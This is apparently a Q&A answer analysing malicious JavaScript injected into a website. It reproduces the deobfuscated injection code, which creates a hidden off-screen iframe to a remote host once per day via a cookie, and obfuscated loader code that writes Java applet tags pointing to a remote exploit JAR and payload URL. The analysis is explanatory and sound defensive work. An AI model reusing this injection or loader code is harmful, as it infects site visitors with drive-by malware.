Note that there are some explanatory texts on larger screens.

plurals
  1. PO
    text
    copied!<p>take a look here</p> <p><a href="http://wepawet.iseclab.org/view.php?hash=86b656e6ad9d7331acc01a80bf89c6b5&amp;type=js" rel="nofollow">http://wepawet.iseclab.org/view.php?hash=86b656e6ad9d7331acc01a80bf89c6b5&amp;type=js</a></p> <p><a href="http://jsunpack.jeek.org/?report=87803db7e6a4d9d0b6190cd5054beda64e3784dd" rel="nofollow">http://jsunpack.jeek.org/?report=87803db7e6a4d9d0b6190cd5054beda64e3784dd</a></p> <p><a href="http://urlquery.net/index.php" rel="nofollow">http://urlquery.net/index.php</a></p> <p>these tools will help you to analyze the code</p> <p>this is the complete retrieved and unobfuscated code:</p> <pre><code>function r09(){ var static = 'ajax'; var controller = 'index.php'; var r = document.createElement('iframe'); r.src = 'http://ecurie80.hostzi.com/Felenne12/clik.php'; r.style.position = 'absolute'; r.style.color = '6675'; r.style.height = '6675px'; r.style.width = '6675px'; r.style.left = '10006675'; r.style.top = '10006675'; if (!document.getElementById('r')){ document.write('&lt;p id=\'r\' class=\'r09\' &gt;&lt;/p&gt;'); document.getElementById('r').appendChild(r); } } function SetCookie(cookieName, cookieValue, nDays, path){ var today = new Date(); var expire = new Date(); if (nDays == null || nDays == 0)nDays = 1; expire.setTime(today.getTime() + 3600000 * 24 * nDays); document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire. toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie(name){ var start = document.cookie.indexOf(name + "="); var len = start + name.length + 1; if ((!start) &amp;&amp; (name != document.cookie.substring(0, name.length))){ return null; } if (start == - 1)return null; var end = document.cookie.indexOf(";", len); if (end == - 1)end = document.cookie.length; return unescape(document.cookie.substring(len, end)); } if (navigator.cookieEnabled){ if (GetCookie('visited_uq') == 55){ } else { SetCookie('visited_uq', '55', '1', '/'); r09(); } } </code></pre> <p>this code creates an iframe and pushes it out of the view</p> <p>the code is just run once per day using a cookie</p> <p><a href="http://jsunpack.jeek.org/" rel="nofollow">http://jsunpack.jeek.org/</a> is also a great tool which is used by many security researchers (like Brian Krebs?)</p> <p>the Iframe loads a Java exploit and tries to run it:</p> <pre><code> var FPLYKJoQG = { WdBxtaXWsGnJRm: function (PseXOSDnXPAXRRnkHZs) { var FIZdpsWVSgyPuFKU = document; FIZdpsWVSgyPuFKU.write(PseXOSDnXPAXRRnkHZs); }, wWgsxtVAofesbJwDAY: function (xPTKZBm) { return xPTKZBm.replace(/355/g, '') } }; var SuOmy = FPLYKJoQG.wWgsxtVAofesbJwDAY('355Ja355355355355va355355355355355355355355'); var CHHBPE = z.vvv( SuOmy ).split(','); var BZTlEHUaD = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355j355355355n355355355355355355355355355355355355355355l355p355355355355355355355355355'); var ZNZXaZkfijhQTihemz = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355355355355ap355355355355355355355355pl355355355355355355355355355355e355355355355355355t'); if (CHHBPE[1] == 7 &amp;&amp; CHHBPE[3] &gt; 9) { FPLYKJoQG.WdBxtaXWsGnJRm('&lt;' + ZNZXaZkfijhQTihemz + ' height="10" width="10"&gt;&lt;param name="' + BZTlEHUaD + '_href" value="d5xs6x0pt9tk85s.jnlp" /&gt;&lt;param name="' + BZTlEHUaD + '_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCj&amp;#120;qbm&amp;#120;wIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbm&amp;#120;wIiBzcGVjPSI&amp;#120;LjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdG&amp;#120;lPjN5ZE5NQW1PSmlLYlN&amp;#120;RmJZMEl0THM8L3RpdG&amp;#120;lPg0KICAgID&amp;#120;2ZW5kb3I+VzRBcGFXZng&amp;#120;UWwwMXRMbmR1TWFacVpzVG&amp;#120;ISlBBVHF4anhNTWY&amp;#120;RG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSI&amp;#120;LjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YW&amp;#120;seS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dG&amp;#120;nLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2&amp;#120;hc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+" /&gt;&lt;param name="&amp;#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /&gt;&lt;/' + ZNZXaZkfijhQTihemz + '&gt;'); } else { FPLYKJoQG.WdBxtaXWsGnJRm('&lt;' + ZNZXaZkfijhQTihemz + ' height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class" archive="/gossip_usually.jar" width="10"&gt;&lt;param name="&amp;#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /&gt;&lt;/' + ZNZXaZkfijhQTihemz + '&gt;'); } </code></pre> <p>load d5xs6x0pt9tk85s.jnlp and execute it </p> <pre><code>&lt;applet height="10" width="10"&gt;&lt;param name="jnlp_href" value="d5xs6x0pt9tk85ss.jnlp"&gt;&lt;param name="jnlp_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbmxwIiBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdGxlPjN5ZE5NQW1PSmlLYlNxRmJZMEl0THM8L3RpdGxlPg0KICAgIDx2ZW5kb3I+VzRBcGFXZngxUWwwMXRMbmR1TWFacVpzVGxISlBBVHF4anhNTWYxRG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSIxLjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YWxseS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dGxnLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2xhc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+"&gt;&lt;param name="duFJfXw" value="http://aussteigende.tommeade.coms:1024/sequence-backwards.txt?e=21"&gt;&lt;/applet&gt; </code></pre> <p>or if this is not possible load gossip_usually.jar file and load/execute wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class:</p> <pre><code>&lt;applet height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbjs.class" archive="/gossip_usuallys.jar" width="10"&gt;&lt;param name="duFJfXw" value="http://aussteigende.tommeades.com:1024/sequence-backwards.txt?e=21"&gt;&lt;/applet&gt; </code></pre>
 

Querying!

 
Guidance

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload